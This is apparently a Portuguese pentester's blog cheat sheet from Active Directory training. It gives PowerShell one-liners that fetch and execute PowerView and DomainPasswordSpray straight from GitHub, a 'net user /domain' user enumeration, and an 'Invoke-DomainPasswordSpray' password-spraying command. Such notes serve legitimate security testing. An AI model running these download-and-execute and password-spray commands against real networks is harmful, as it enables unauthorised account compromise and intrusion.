Posts Dicas para Pentest Interno
Post
Cancel

Dicas para Pentest Interno

Fiz um treinamento na Pentester Academy que achei muito proveitoso [1] (aconselho fortemente o treinamento). Lá aprendi diversas técnicas e fiz várias anotações. Com o tempo perdi várias delas e senti falta no dia-a-dia. Então seguindo o costume de usar o blog como meu bloco de notas, coloco abaixo as tricks que senti mais falta nos ultimos meses.

Download de Arquivos


Para baixar um arquivo .ps1 de uma origem remota e executar o script com apenas um comando.


1
iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -UseBasicParsing)

No comando acima eu baixei o PowerView e já o executei, assim ele já está disponível na minha sessão do Powershell após a execução do comando.

Password Spray Attack


Uma maneira simples de conseguir a lista de usuários de uma rede - levando em conta que você tenha comprometido uma máquina do domínio é executar o seguinte comando:

1
net user /domain

Se usamos o script DomainPasswordSpray [2] para realizar o ataque não precisamos da lista de usuários, pois ele mesmo já realiza a etapa de coleta de usuários e posteriormente de ataque às senhas. Para carregar o script fazemos:

1
iex (iwr https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1 -UseBasicParsing)

Para usar o script já carregado e atacar os usuários da rede, tentando a senha “SenhaAqui”:

1
Invoke-DomainPasswordSpray -Password SenhaAqui

Referências

[1] https://www.pentesteracademy.com/activedirectorylab [2] https://github.com/dafthack/DomainPasswordSpray

This post is licensed under CC BY 4.0 by the author.